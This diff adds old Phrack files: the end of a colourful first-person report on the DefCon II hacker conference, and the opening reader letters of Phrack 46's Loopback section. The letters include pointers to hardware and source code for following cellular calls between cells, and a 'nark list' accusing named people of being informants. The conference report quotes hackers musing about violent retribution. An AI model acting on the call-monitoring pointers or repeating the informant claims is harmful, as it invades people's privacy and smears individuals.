+over 40) I had to vehemently deny being a Fed.  Finally Jeff Moss 
+came to the rescue.
+
+"He's not a Fed.  He's a security guy and a writer."
+
+"Ugh!  That's worse.  Can I get a T-shirt cause he's  a  writer?"  
+No way hacker-breath.
+
+Jeff.   Jeff Moss. Not what I expected.  I went to school with  a 
+thousand Jeff Mosses.  While I had hair down to my waist, wearing 
+paisley leather fringe jackets and striped bell bottoms so wide I 
+appeared to be standing on two inverted ice cream cones, the Jeff 
+Mosses  of  the world kept  their parents  proud.   Short,  short 
+cropped  hair,  acceented by an ashen pall and  clothes  I  stlll 
+wouldn't  wear  today.  They could get away with  anything  cause 
+they  didn't look the part of radical chic.  Jeff, I really  like 
+Jeff: he doesn't look like what he represents.  Bruce  Edelstein, 
+(now of HP fame) used to work for me.  He was hipper than hip but 
+looked squarer than square.  Now today that doesn't mean as  much 
+as  it used to, but we ex-30-somethings have a hard time  forget
+ting  what rebellion was about. (I was suspended 17 times in  the 
+first semester of 10th grade for wearing jeans.)
+
+Jeff  would  fit into a Corporate Board Meeting if  he  wore  the 
+right suit and uttered the right eloquencies:  Yes, that's it:  A 
+young  Tom Hanks.  Right.  I used to hate Tom Hanks (Splash,  how 
+fucking stupid except for the TV-picture tube splitting  squeals) 
+but  I've come to respect the hell out of him as an actor.   Jeff 
+never  had to pass through that first phase.  I  instantly  liked 
+him and certainly respect his ability to pull off a full  fledged 
+conference for only $5000.  
+
+You  read  right. Five grand and off to Vegas with  300  of  your 
+closest personal friends, Feds in tow, for a weekend of electron
+ic  debauchery.   "A few hundred for the brochure, a few  hundred 
+hear, a ton in phone bills, yeah, about $5000 if no one does  any 
+damage."   Big time security shows cost $200,000 and up.   I  can 
+honestly  say  without meaning anything pejorative at any  of  my 
+friends and busienss acquaintances, that I do not learn 40  times 
+as  much  at the 'real' shows.  Something is definitely out of  
+whack  here.  Suits want to see suits.  Suits want to see  fancy.  
+Suits want to see form, substance be damned.  Suits should take a 
+lesson from my friend Jeff.
+
+			* * * * *
+
+I again suffered through a tasteless Saharan buffer dinner  which 
+cost me a whopping $7.95.  I hate grits - buttered sand is what I 
+call  them  - but in this case might well have  been  preferable.  
+Somehow  I  coerced a few hackers to join me in  the  ritualistic 
+slaughter of our taste buds and torture of our intestines.   They 
+were  not pleased with my choice of dining, but then who gives  a 
+shit?  I couldn't taste anything anyway.  Tough. 
+
+To keep our minds off of the food we talked about something much 
+more pleasant: the recent round of attacks on Pentagon  computers 
+and  networks.  "Are the same people involved as in the  sniffing 
+attacks earlier this year?" I asked my triad of dinner mates. 
+
+"Indubitably."
+
+"And what's the reaction from the underground - other hackers?"
+
+Coughs, sniffs.  Derisive visual feedback. Sneers. The finger.
+
+"We can't stand 'em.  They're making it bad for everybody."   Two 
+fingers.
+
+By and large the DefCon II hackers are what I call 'good hackers' 
+who hack, and maybe crack some systems upon occasion, but  aren't 
+what  I refer to as Information Warriors in the bad sense of  the 
+word.   This group claimed to extol the same position as most  of 
+the  underground  would:   the Pentagon sniffing  crackers  -  or 
+whoever  who  is assaulting thousands of computers on the  net  - 
+must be stopped. 
+
+"Scum bags, that what they are."  I asked that they not sugarcoat 
+their feelings on my behalf.  I can take it.  "These fuckers  are 
+beyond belief; they're mean and don't give a shit how much damage 
+they  do."  We played with our food only to indulge in the single 
+most  palatable edible on display: ice cream with gobs of  choco
+late syrup with a side of coffee. . 
+
+The big question was, what to do?  The authorities are  certainly 
+looking  for a legal response; perhaps another Mitnick or  Phiber 
+Optik.   Much  of  the underground cheered when  Mark  Abene  and 
+others from the reknowned Masters of Destruction went to spend  a 
+vacation  at the expense of the Feds.  The MoD was up to no  good 
+and  despite  Abene's cries that there was no such thing  as  the 
+MoD, he lost and was put away.  However many hackers believe as I 
+do, that sending Phiber to jail for hacking was the wrong punish
+ment.  Jail time won't solve anything nor cure a hacker from  his 
+first  love.   One might as well try to cure a  hungry  man  from 
+eating:   No, Mark did wrong, but sending him to jail was  wrong, 
+too.   The  Feds and local computer cops and the courts have  to   
+come  up with punishments appropriate to the crime.  Cyber-crimes 
+(or cyber-errors) should not be rewarded by a trip to an all male 
+hotel where the favorite toy is a phallically carved bar of soap.
+
+On  the other hand, hackers in general are so incensed  over  the 
+recent swell of headline grabbing break-ins, and law  enforcement 
+has  thus far appeared to be impotent, ("These guys  are  good.") 
+that many are searching for alternative means of retribution.
+
+"An IRA style knee capping is in order," said one.
+
+"That's  not  good enough, not enough pain," chimed  in  another.  
+(Sip, sip. I can almost taste the coffee.)
+
+"Are  you  guys serious?" I asked.  Violence?  You? I  thought  I 
+knew them better than that. I know a lot of hackers, none that  I 
+know  of  is  violent,  and this  extreme  Pensacola  retribution 
+attitude seemed tottally out of character.  "You really  wouldn't 
+do that, would you?"  My dinner companions were so upset and they 
+claimed to echo the sentiment of all good-hackers in good  stand
+ing, that yes, this was a viable consideration.
+
+"The Feds aren't doing it, so what choice do we have?  I've heard 
+talk  about  taking up a collection to pay for a hit man .  .  ."  
+Laughter around, but nervous laughter. 
+
+"You wouldn't. . ." I insisted.
+
+"Well,  probably  not  us, but that  doesn't  mean  someone  else 
+doesn't won't do it." 
+
+"So you know who's behind this whole thing."
+
+"Fucking-A  we do," said yet another hacker chomping at the  bit. 
+He was obviously envisioning himself  with a baseball bat in  his 
+hand.
+
+"So do the Feds."
+
+So now I find myself in the dilemma of publishing the open secret 
+of who's behind the Internet sniffing and Pentagon break ins, but 
+after  talking  to people from both the underground and  law  en
+forcement,  I think I'll hold off awhile  It serves no  immediate 
+purpose other than to warn off the offenders, and none of us want 
+that.
+
+Obviously all is not well in hacker-dom.
+
+			* * * * *
+
+The  registration  area  was beyond  full;  computers,  backpacks 
+everywhere,  hundreds  of what I have to refer to as kids  and  a 
+fair number of above ground security people.  Padgett Peterson of 
+Martin  Marietta was going to talk about viruses, Sara Gordon  on 
+privacy, Mark Aldrich is a security guy from DC., and a  bunch of   
+other  folks I see on the seemingly endless security  trade  show 
+circuit. Jeff Moss had marketed himself and the show excellently.  
+Los Angeles sent a TV crew, John Markoff from the New York  Times 
+popped  in as did a writer from Business Week.  (And  of  course, 
+yours truly.) 
+
+Of  the  360 registrees ("Plus whoever snuck in," added  Jeff)  I 
+guess about 20% were so-called legitimate security people. That's 
+not to belittle the mid-20's folks who came not because they were 
+hackers, but because they like computers.  Period.  They hack for 
+themselves and not on other systems, but DefCon II offered  some
+thing for everyone.  
+
+I  remember 25 years ago how my parents hated the way  I  dressed 
+for  school or concerts or just to hang out: God forbid! We  wore 
+those damned jeans and T-shirts and sneakers or boots! "Why can't 
+you dress like a human being," my mother admonished me day  after 
+day,  year after year.  So I had to check myself because I  can't 
+relate  to Seattle grunge-ware. I'm just too damned old  to  wear 
+shirts that fit like kilts or sequin crusted S&M leather  straps.  
+Other   than  the  visual  cacophony  of  dress,   every   single 
+hacker/phreak that I met exceeded my expectations in the area  of 
+deportment.
+
+These  are not wild kids on a rampage.  The stories  of  drug-in
+duced  frenzies  and peeing in the hallways  and  tossing  entire 
+rooms  of  furniture  out of the window that  emanated  from  the 
+HoHoCons  seemed  a million miles away.  This was  admittedly  an 
+opportunity  to party, but not to excess.  There was work  to  be 
+done, lessons to be learned and new friends to make.  So  getting 
+snot  nosed drunk or ripped to the tits or Ecstatically high  was 
+just not part of the equation.  Not here.
+
+Now   Vegas  offers something quite distinct  from  other  cities 
+which host security or other conventions.  At a Hyatt or a Hilton 
+or  any other fancy-ass over priced hotel, beers run $4 or  $5  a 
+crack  plus  you're expected to tip the black tied  minimum  wage 
+worker  for  popping the top.  The Sahara (for all of  the  other 
+indignities we had to suffer) somewhat redeemed  itself by offer
+ing an infinite supply of $1 Heinekens. Despite hundreds of  beer 
+bottle  spread  around the huge conference area  (the  hotel  was 
+definitely  stingy in the garbage pail business) public  drunken
+ness  was  totally absent.  Party yes.  Out of control?  No  way.  
+Kudos!
+
+Surprisingly, a fair number of women (girls) attended.  A handful 
+were there 'for the ride' but others . . . whoa! they know  their 
+shit. 
+
+I hope that's not sexist; merely an observation.  I run across so 
+few  technically fluent ladies it's just a gut reaction.  I  wish 
+there  were more.  In a former life, I owned a TV/Record  produc
+tion  company called Nashville North. We specialized  in  country 
+rock taking advantage of the Urban Cowboy fad in the late 1970's. 
+Our crew of producers and engineers consisted of the   "Nashville  
+Angels."  And boy what a ruckus they would cause when we recorded 
+Charlie  Daniels  or Hank Williams: they  were  stunning.   Susan 
+produced and was a double for Jacqueline Smith; we  called  Sally 
+"Sabrina"  because  of her boyish appearance and  resemblance  to 
+Kate Jackson.  A super engineer.  And there was Rubia Bomba,  the 
+Blond  Bombshell,  Sherra,  who I eventually  married:  she  knew 
+country music inside and out - after all she came from  Nashville 
+in the first place.  
+
+When we would be scheduled to record an act for live radio,  some 
+huge famous country act like Asleep at The Wheel of Merle Haggard 
+or Johnny Paycheck or Vassar Clements, she would wince in  disbe
+lief when we cried, "who's that?"  Needless to say, she knew  the 
+songs, the cues and the words.  They all sounded alike.   Country 
+Music?  Ecch.  (So I learned.)
+
+At  any rate, ladies, we're equal opportunity  offenders.   C'mon 
+down and let's get technical.
+
+As  the  throngs pressed to register, I saw an old  friend,  Erik 
+Bloodaxe.   I've  known him for several years now and  he's  even 
+come  over to baby sit the kids when he's in town.   (Good  prac
+tice.)    Erik  is about as famous as they come in the  world  of 
+hackers.   Above ground the authorities investigated him for  his 
+alleged  participation in cyber crimes: after all, he was one  of 
+the  founders of the Legion of Doom, and so, by default, he  must 
+have done something wrong.  Never prosecuted, Erik Bloodaxe lives 
+in  infamy amongst his peers.  To belay any naysayers,  Erik  ap
+peared on every single T-shirt there.
+
+			"I Only Hack For Money,"
+				 Erik Bloodaxe
+
+proclaimed  dozens of shirts wandering through  the  surveillance 
+laden casinos. His is a name that will live in infamy.  
+
+So  I  yelled  out, "Hey Chris!"  He gave  his  net-name  to  the 
+desk/table registrar. "Erik Bloodaxe."
+
+"Erik  Bloodaxe?"  piped up an excited high pitched  male  voice.  
+"Where?"  People pointed at Chris who was about to be  embarrass
+ingly amused by sweet little tubby Novocain who practically bowed 
+at Chris's feet in reverence.  "You're Erik Bloodaxe?"   Novocain 
+said  with nervous awe - eyes gleaming up at Chris's  ruddy  skin 
+and blond pony-tail.  
+
+"Yeah,"  Chris  said in the most off handed  way  possible.   For 
+people who don't know him this might be interpreted as  arrogance 
+(and yes there is that) but he also has trouble publicly  accept
+ing  the  fame  and respect that  his  endearing  next-generation 
+teenage fans pour on him.
+
+"Wow!"  Novocain  said with elegance and panache.   "You're  Erik 
+Bloodaxe."  We'd just been through that said Chris's eyes.
+
+"Yeah."
+
+"Wow,  well,  um,  I  . . . ah . . . you're . . .  I  mean,  wow, 
+you're  the best."  What does Sylvia Jane Miller from  Rumpsteer, 
+Iowa  say to a movie star?  This about covered it.   The  Midwest 
+meets  Madonna.   "Wow!"   Only here it's  Novocain  meets  Cyber 
+Christ himself.
+
+
+
+Like any other security show or conference or convention there is 
+a kickoff, generally with a speech.  And DefCon II was no  excep
+tion.  Except.
+
+Most conventional conventions (ConCons) start at 7:30 or 8:00  AM 
+because, well,  I don't know exactly why, except that's when  so-
+called  suits are expected to show up in their cubicles.     Def
+Con, on the other hand, was scheduled to start at 10PM on  Friday 
+night  when  most  hakcers show up for work.  Most  everyone  had 
+arrived  and we were anxiously awaiting the  opening  ceremonies.  
+But, here is where Jeff's lack of experience came in.  The  kick-
+off speaker was supposed to be Mark Ludwig of  virus writing fame 
+and controversy.  But, he wasn't there!
+
+He had jet lag.
+
+"From Phoenix?" I exclaimed in mock horror to which nearby  hack
+ers saw the absurdity of a 45 minute flight jet lag.  Mark has  a 
+small  frame and looks, well, downright weak, so I figured  maybe 
+flying  and  his constitution just didn't get along  and  he  was 
+massaging his swollen adenoids in his room.  
+
+"Oh,  no!  He's  just come in from Australia . .  ."   Well  that 
+explains it, alright!  Sorry for the aspersions, Mark.
+
+But Jeff didn't have a back up plan. He was screwed.  Almost four 
+hundred people in the audience and nothing to tell them.  So, and 
+I can't quite believe it, one human being who had obviously never 
+stood  in front of a live audience before got up in an  impromptu 
+attempt  at stand up comedy.  The audience was ready  for  almost 
+anything  entertaining but this guy wasn't. Admittedly it  was  a 
+tough spot, but . . .
+
+"How do you turn a 486 into an 8088?"  
+
+"Add Windows."  Groan. Groan.
+
+"What's  this?"  Picture the middle three fingers of  your  right 
+hand wiggling madly.
+
+"An  encrypted  this!"   Now hold out  just  the  middle  finger.  
+Groan.  Groan.
+
+"What's  this?"   Spread your legs slightly  apart,  extend  both 
+hands to the front and move them around quickly in small circles.
+
+"Group Air Mouse."  Groan. 
+
+The  evening  groaned on with no Mark nor any able  sharp  witted 
+comedian in sight. 
+
+
+
+Phil  Zimmerman wrote PGP and is a God, if not Cyber-Christ  him
+self to much of the global electronic world.  Preferring to  call 
+himself a folk hero (even the Wall Street Journal used that term) 
+Phil's diminutive height combined with a few too many pounds  and 
+a  sweet  as sweet can be smile earn him the title  of  Pillsbury 
+Dough  Boy look alike.  Phil is simply too nice a guy to  be  em
+broiled  in a Federal investigation to determine if he broke  the 
+law  by  having PGP put on a net site.  You see, the  Feds  still 
+think  they can control Cyberspace, and thereby maintain  antique 
+export laws: "Thou shalt not export crypto without our  approval" 
+sayeth the NSA using the Department of Commerce as a whipping boy 
+mouth  piece.  So now Phil faces 41-51 months of  mandatory  jail 
+time if prosecuted and convicted of these absurd laws.  
+
+Flying  in from Colorado, his appearance was  anxiously  awaited. 
+"He's really coming?"  " I wonder what he's like?"  (Like  every
+one  else, fool, just different.)  When he did arrive, his  shit-
+eating  grin  which really isn't a shit-eating  grin,  it's  just 
+Phil's own patented grin, preceeded him down the hallway.  
+
+"Here  he is!"  "It's Phil Zimmerman."  Get down and bow.   "Hey, 
+Phil the PGP dude is here."
+
+He  was  instantly surrounded by those who recognize him  and  by 
+those  who  don't but  want  to  feel like part of the  in-crowd.  
+Chat chat, shit-eating grin, good war stories and G-rated  pleas
+antries.  Phil was doing what he does best: building up the  folk 
+hero image of himself.  His engaging personality (even though  he 
+can't  snorkel to save his ass) mesmerized the young-uns  of  the 
+group.  "You're Phil?"  
+
+"Yeah."   No  arrogance,  just a warm  country  shit-eating  grin 
+that's  not really shit-eating.  Just Phil being Phil.  He  plays 
+the part perfectly.
+
+Despite the attention, the fame, the glory (money? nah . . .) the 
+notoriety and the displeased eyes of onlooking Computer Cops  who 
+really  do  believe he belongs in jail for 4 years,  Phil  had  a 
+problem tonight.  A real problem.
+
+"I  don't have a room!" he quietly told Jeff at the desk.   "They 
+say  I'm  not registered."  No panic.  Just  a  shit-eating  grin 
+that's not a shit-eating grin and hand the  problem  over  to the 
+experts:  in  this case Jeff Moss.  Back to his  endearing  fans.  
+Phil is so damned kind I actually saw him giving Cryptography 101 
+lessons  on  the corner of a T-shirt encrusted table.  "This  is   
+plaintext and this is crypto.  A key is like a key to your  hotel 
+room . . . "   If only Phil had a hotel room.
+
+Someone  had screwed up. Damn computers.  So the search  was  on.  
+What had happened to Phil's room?  Jeff is scrambling and  trying 
+to  get the hotel to rectify the situation. Everyone  was  abuzz.  
+Phil,  the  crypto-God himself was left out in  the  cold.   What 
+would he do?
+
+When  suddenly, out of the din in the halls, we heard  one  voice 
+above all the rest:
+
+"Phil can sleep with me!"  
+
+Silence.   Dead stone cold silence.  Haunting silence like  right 
+after  an  earthquake and even the grubs and  millipedes  are  so 
+shaken they have nothing to say.  Silence. 
+
+The  poor kid who had somehow instructed his brain to  utter  the 
+words  and permitted them to rise through his esophagus  and  out 
+over  his  lips stood the object of awe, incredulity  and  mental 
+question marks.  He must have thought to himself, "what's  every
+one  staring  at?  What's going on?  Let me in on it."   For  the 
+longest  10 seconds in the history of civilization he  had  abso
+lutely no clue that he was the target of attention.  A handful of 
+people even took two or three steps back, just in case.  Just  in 
+case of what was never openly discussed, but nonetheless, just in 
+case.
+
+And  then the brain kicked in and a weak sheepish smile of  guilt 
+overcame  this cute acne-free baby-butt smooth-faced  hacker  who 
+had  certainly  never had a shave, and was barely old  enough  to 
+steer his own pram. 
+
+"Ohhhhhh . . . . noooooo," he said barely louder than a  whisper.  
+"That' not what I mean!"
+
+I nearly peed laughing so hard in unison with a score of  hackers 
+who agreed that these misspoken words put this guy in the unenvi
+able  position  of being the recipient of a  weekend  of  eternal 
+politically incorrect ridicule.  
+
+"Yeah, right.  We know what you mean . . "
+
+"No  really . . ." he pleaded as the verbal assaults on  his  al
+leged sexual preferences were slung one after the other.  
+
+This  poor kid never read Shakespeare: "He who doth  protest  too 
+much . . ."  
+
+If  we  couldn't have a great kickoff speech, or  comedian,  this 
+would have to do.  
+
+The majority of the evening was spent making acquaintances:
+
+"Hi, I'm Jim.  Oops, I mean 'Septic Tank," was greeted with  "Oh, 
+you're Septic. I'm Sour Milk."  (Vive la difference!) People  who 
+know  each  other electronically are as surprised to  meet  their 
+counterparts  as are first daters who are in love with the  voice 
+at  the other end of the phone.  "Giving good phone" implies  one 
+thing while "Having a great keystroke" just might mean another.  
+
+The din of the crowd was generally penetrated by the sounds of  a 
+quasi-pornographic  Japanese high tech toon of  questionable  so
+cially redeeming value which a majority of the crowd appeared  to 
+both  enjoy and understand.  I am guilty of neither by reason  of 
+antiquity.
+
+And so it goes.
+
+			* * * * * 
+
+Phil Zimmerman must have gotten a room and some sleep because  at 
+10AM  (or closely thereafter) he gave a rousing (some  might  say 
+incendiary)  speech  strongly attacking the  government's  nearly 
+indefensible position on export control  
+
+I was really impressed.  Knowing Phil for some time, this was the 
+first  time I ever heard him speak and he did quite an  admirable 
+job.  He ad libs, talks about what he want to talk about and does 
+so in a compelling and emotional way. His ass is on the line  and 
+he  should be emotional about it.  The audience, indeed  much  of 
+counter culture Cyberspace loves Phil and just about anything  he 
+has  to  say.  His affable 40-something attorney  from  Colorado, 
+Phil  DuBois  was there to both enjoy the  festivities  and,  I'm 
+sure,  to keep tabs on Phil's vocalizations.  Phil is almost  too 
+honest  and open for his own good.  Rounds and rounds of  sincere 
+appreciation.
+
+
+
+Hey  kids,  now  it's time for another round  of  Spot  The  Fed.  
+Here's  your  chance to win one of these wonderful "I  Spotted  A 
+Fed" T-shirts. And all you have to do is ID a fed and it's yours.  
+Look  around you?  Is he a Fed?  Is she under cover or under  the 
+covers? Heh, heh.  Spot the Fed and win a prize.  This  one-size-
+fits-all  XXX Large T-shirt is yours if you Spot the Fed.  I  had 
+to  keep silent.  That would have been cheating.  I hang  out  on 
+both sides and have a reputation to maintain.
+
+"Hey,  I  see one" screeched a female voice (or  parhaps  it  was 
+Phil's  young admirer) from the left side of the 400+ seat  ball
+room.   Chaos!  Where? Where?  Where's the fed?  Like  when  Jose 
+Consenko  hits  one  towards the center field  fence  and  70,000 
+screaming  fans  stand on their seats to get a better view  of  a 
+three inch ball 1/4 mile away flying at 150 miles per  hour, this 
+crowd stood like  Lemmings  in view of Valhalla the Cliff to espy  
+the  Fed.  Where's the Fed?
+
+Jeff jumped off the stage in anxious anticipation that yet anoth
+er anti-freedom-repressive law enforcement person had blown   his  
+cover.   Where's the Fed?  Jeff is searching for the accuser  and 
+the  accused.  Where's the Fed?  Craned necks as far as  the  eye 
+can see; no better than rubber neckers on Highway 95 looking  for 
+steams of blood and misplaced body parts they half expected a Fed 
+to  be  as  distinctly obvious as Quasimoto  skulking  under  the 
+Gorgoyled parapits of Notre Dame.  No such luck.  They look  like 
+you and me. (Not me.)  Where's the Fed?
+
+He's getting closer, closer to the Fed.  Is it a Fed?  Are you  a 
+Fed?  C'mon, fess up.  You're a a fed. Nailed.  Busted.  Psyche!
+
+Here's  your  T-shirt.   More fun than Monty  Hall  bringing  out 
+aliens  from behind Door #3 on the X-Files.  Good clean fun.  But 
+they didn't get 'em all.  A couple of them were real good.   Must 
+have  been  dressed  like an Hawaiian surf bum  or  banshee  from 
+Hellfire, Oregon.  Kudos to those Feds I know never got  spotted.  
+Next year, guys.  There's always next year.
+
+Phil's notoriety and the presence of the Phoenix, Arizona prosecu
+tor   who was largely responsible for the dubiously effective  or 
+righteous  Operation  Sun Devil, Gail Thackeray  ("I  change  job 
+every 4 years or so - right after an election")  brought out  the 
+media.  The LA TV station thought they might have the makings  of 
+a story and sent a film crew for the event.  
+
+"They're Feds. The ones with the cameras are Feds.  I know it. Go 
+ask 'em."  No need. Not. 
+
+"Put away that camera."  At hacking events it's proper  etiquette 
+to ask if people are camera shy before shooting.   The guy that I 
+was  sitting next to buried his face in his hands to avoid  being 
+captured on video tape. 
+
+"What are you; a Fed or a felon?" I had to ask.
+
+"What's the difference," his said.  "They're the same thing."  So 
+which  was it, I wondered.  For the truly paranoid by  the  truly 
+paranoid.   
+
+"Get  that  thing outta here," he motioned to the film  crew  who 
+willingly  obliged  by turning off the lights.   "They're  really 
+Feds,"  he whispered to me loud enough for the row in  front  and 
+behind us to hear.  
+
+I moved on.  Can't take chances with personal safety when I  have 
+kids to feed.  Fed or felon, he scared me.
+
+Gail Thackeray  was the next act on stage. She was less in agree
+ment about Phil Zimmerman than probably anyone (except the  unde
+tected Feds) in the audience.  She, as expected, endorsed much of 
+the  law  enforcement programs that revolve  around  various  key 
+management  (escrow) schemes.  Phil recalls a letter  from  Burma 
+that  describe how the freedom fighters use PGP to  defend  them
+selves against repression.  He cites the letter from Latvia  that 
+says  electronic  freedom as offered by PGP is one of  the  only   
+hopes for the future of a free Russia.  Gail empathizes but  sees 
+trouble  closer  to home. Terrorism a la World Trade  Center,  or 
+rocket launchers at O'Hare Airport, or little girl snuff films in 
+Richmond,  Virginia,  or the attempt to poison the  water  supply 
+outside of Boston.  These are the real threats to America in  the 
+post Cold War era.
+
+"What about our personal privacy!" cries a voice.  "We don't want 
+the  government listening in.  It's Big Brother 10  years  behind 
+schedule." 
+
+Gail  is amused.  She knew it would be a tough audience  and  has 
+been through it before.  She is not shaken in the least.  
+
+"I've read your mail," she responds.  "Its not all that interest
+ing."   The audience appreciates a good repartee. "You gotta  pay 
+me  to  do this, and frankly most of it is pretty  boring."   She 
+successful made her point and kept the audience laughing all  the 
+way.
+
+She then proceeded to tell that as she sees it, "The  expectation 
+of  privacy isn't real."  I really don't like hearing this for  I 
+believe  in the need for an Electronic Bill of Rights.  I  simply 
+think she's wrong.  "History is clear," she said  "the ability to 
+listen in used to be limited to the very few.  The telegraph  was 
+essentially  a  party line and still today in  some  rural  areas 
+communications aren't private.  Why should we change  it now?"
+
+"Gail,  you're so full of shit!" A loud voice bellowed from  next 
+to me again. Boy can I pick seats. "You know perfectly well  that 
+cops  abuse the laws and this will just make their  jobs  easier. 
+Once people find a way to escape tyranny you all want to bring it 
+right  back again.  This is revolution and you're scared of  los
+ing.  This kind of puke scum you're vomiting disgusts me.  I just 
+can't  take it any more. " Yeah, right on.   Scattered  applause.  
+While  this  'gent' may have stated what was on many  minds,  his 
+manner was most unbefitting a conference and indeed, even  DefCon 
+II.   This was too rude even for a hacker get-together.  The  man 
+with  the  overbearing comments sat down apologizing.  "She  just 
+gets  me going, she really does.  Really pisses me off  when  she 
+goes on like about how clean the Feds are.  She knows better than 
+to run diarrhea of the mouth like that."
+
+"You  know,"  she continued.  "Right across the street is  a  Spy 
+Shop.  One of those retail stores where you can buy bugs and taps 
+and eavesdropping equipment?"  The audience silently nodded.  "We 
+as law enforcement are prohibited by law from shopping there  and 
+buying  those same things anyone else can.  We're losing on  that 
+front."  Cheers. Screw the Feds.
diff --git a/phrack46/2.txt b/phrack46/2.txt
new file mode 100644
index 0000000..6fd98e8
--- /dev/null
+++ b/phrack46/2.txt
@@ -0,0 +1,1169 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 2 of 28
+
+****************************************************************************
+
+                                Phrack Loopback
+
+
+------------------------------------------------------------------------------
+
+I'd like to write you about my friends cat.  His name is 'Cid.  Cid
+loves reading, in fact he'll read just about anything, from the labels on
+his cat food tins to the instructions on the "real" use of his Grafix
+(incense burner :) ).  Well one take, 'Cid (or was it me) was indulging
+in the reason he got his moniker and mentioned that he'd like to receive
+Phrack.  Well i told him he could just subscribe to it and then he went
+into a real sob story about how he doesn't have net access.  So as a
+favor to 'Cid (who really does exist, and really has tripped out on brain
+blotters) i'd like to subscribe to Phrack.
+
+[You my want to take note that Phrack can also be printed on paper.
+ Now, that's a lot of blotter.
+
+ You've got your subscription, now go watch some anime.]
+
+------------------------------------------------------------------------------
+
+I recently got a new job and shortly after beginning working there, they
+decided to retool and reorganize a bit for better productivity.
+
+While we were going through some old boxes and stuff, I came across a
+little black box with the words "Demon Dialer" molded into the front of
+it, it even had the (functional!) 20volt power supply.
+
+Needless to say I was pretty happy with my find.  I asked if I could have
+it and since no one else there seemed to know what to make of it, mine it
+was!
+
+My only problem now... I've played around with it, and it seems to do a
+lot more than what I originally thought, but the fact of the matter is..
+I really haven't the foggiest idea of how to get it to REALLY work for me.
+
+If anyone has any information, or better still, actual documentation for
+a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.
+
+Also, something rater strange.  The phone cable attached to it had a
+normal looking 4-wire connector on one end, but the other was split to
+have RJ jacks, one with the yellow-black combo and one with the
+red-green.  The split ends (sorry :)) were plugged into the WALL and
+PHONE jacks on the demon dialer.  The purpose for this perplexes me since
+one's supposed to be input and one's supposed to be a passthrough for the
+phone to be plugged into.
+
+Anyway, any info would be nice.  Thanks guys.
+
+[Telephonics was one of those odd telco device manufacturers back in the
+ 80's.  They made the demon dialer (a speed dialing device), a
+ two-line conference box, a divertor, etc.  Essentially, they provided
+ in hardware what the telco's were beginning to roll-out in software.
+
+ I think the line splitter you have was merely plugged into those
+ two jacks for storage purposes.  What that probably was for was to
+ allow two lines to use the Demon Dialer.  It was probably just reversed
+ when your company boxed it so it wouldn't get lost.
+
+ I'm not sure if Telephonics is still in business.  A good place to
+ start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
+ Another good place may be Hello Direct (800-HI-HELLO).  They used to
+ do have Telephonics equipment available for mail-order.]
+
+------------------------------------------------------------------------------
+
+I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
+Supposedly it intersperses tales of his exploits with code and examples.
+I have big doubts, but have you heard anything good/bad about it?
+
+[Your doubts are well founded.  I got an advance copy of that book.
+ Let's put it this way:  does any book that contains over a dozen pages
+ of "common passwords" sound like ground breaking material?
+
+ This book is so like "Out of the Inner Circle" that I almost wanted
+ to believe Knightmare (Dennis Fiery) was really yet another
+ alias for Bill Landreth.  Imagine "Out of the Inner Circle" with
+ about a hundred or more extra pages of adjectives and examples that
+ may have been useful years back.
+
+ The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
+ gave law enforcement a big buffer of the Black Ice Private BBS
+ and help spark the infamous LOD Hacker Crackdown, certainly didn't
+ have anything to do with this.  In fact, the book has a kind of
+ snide tone to it and is so clueless, that leads me to believe it
+ may have been written by a cop or security type person looking to
+ make a quick buck.
+
+ As far as source code, well, there is a sample basic program that
+ tries to emulate a university login.
+
+ If you want a good book, go buy "Firewalls and Internet Security" by
+ Cheswick and Bellovin.]
+
+------------------------------------------------------------------------------
+
+Hey Chris,
+
+I'm sure you are under a constant avalanche of requests for certain files,
+so I might as well add to your frustration <grin>.  I know of a program
+that supposedly tracks cellular phone frequencies and displays them on
+a cellmap.  However, I don't know the name of the program or (obviously)
+where to find this little gem.  I was wondering if you could possibly
+enlighten me on a way to acquire a program similar to the one I have
+described.  I have developed some other methods of tracking locations
+of cellular calls.  However my methods rely on a database and manually
+mapping cellular phones, this method is strictly low tech.  Of course
+this would be for experimental use only, therefore it would not be used
+to actually track actual, restricted, radio spectrum signals.  I wouldn't
+want the aether Gestapo pummeling our heads and necks.
+
+[I don't know of anything that plots frequencies on a cellmap.  How would
+ you know the actual locations of cells for whatever city you may
+ be in to plot them accurately?
+
+ There are a number of programs written to listen to forward channel messages
+ and tell you when a call is going to jump to another channel.  The cellular
+ telephone experimenter's kit from Network Wizards has a lot of nice
+ C source that will let you write your own programs that work with their
+ interface to the OKI 900.  I suppose you could get the FCC database
+ CD-ROM for your state and make note of longitude and latitude of cell sites
+ and make your own database for your city, and then make a truly
+ visual representation of a cellmap and watch calls move from cell to cell.
+ But I don't think there is such a thing floating around the underground
+ at present.
+
+ Of course the carriers have this ability, and are more than happy to make
+ it available to Law Enforcement (without a warrant mind you).  Hi OJ!
+
+ email Mark Lottor mw@nw.com for more info about the CTEK.]
+
+------------------------------------------------------------------------------
+
+I saw this in a HoHoCon ad:
+
+        Top Ten Nark List
+        1. Traxxter
+        2. Scott Chasin
+        3. Chris Goggans
+        4. Aget Steal
+        5. Dale Drrew
+        6. Cliff Stoll
+        7. [blank]
+        8. Julio Fernandez
+        9. Scanman
+       10. Cori Braun
+
+What did Chris Goggans do?  Isn't he Erik Bloodaxe, the publisher of
+Phrack?  I sincerely doubt that the feds would have someone
+working for them that puts out a publication like Phrack.  It would
+be way too much of an embarrassment for them.  I wrote to the
+editor of Phrack when I read that Agent Steal said that the publisher
+of Phrack was a Fed - IN PHRACK no less.  He said it was a stupid rumor.
+Is there anything to support this fact?  And why is there now some manhunt for
+Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
+their employee?  The whole thing is very confusing to me.  Please explain.
+If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
+Nevertheless, what's the story here?
+
+[First off, I think you take things a little too seriously.  If you are on
+ a nark hunt, worry about your associates, not people you obviously
+ don't even know.  Chris Goggans (ME) is most positively Erik Bloodaxe.
+ Thanks for remembering.
+
+ Agent Steal was involved with the FBI.  This is a fact.
+ In his case, he even appeared to have some kind of immunity while trying
+ to gather information on other hackers like Mitnik and Poulsen.  This
+ immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
+ new rumors go), since Steal was pulling a fast one and committing crimes
+ the Bureau didn't know about to get some quick cash while he set up his
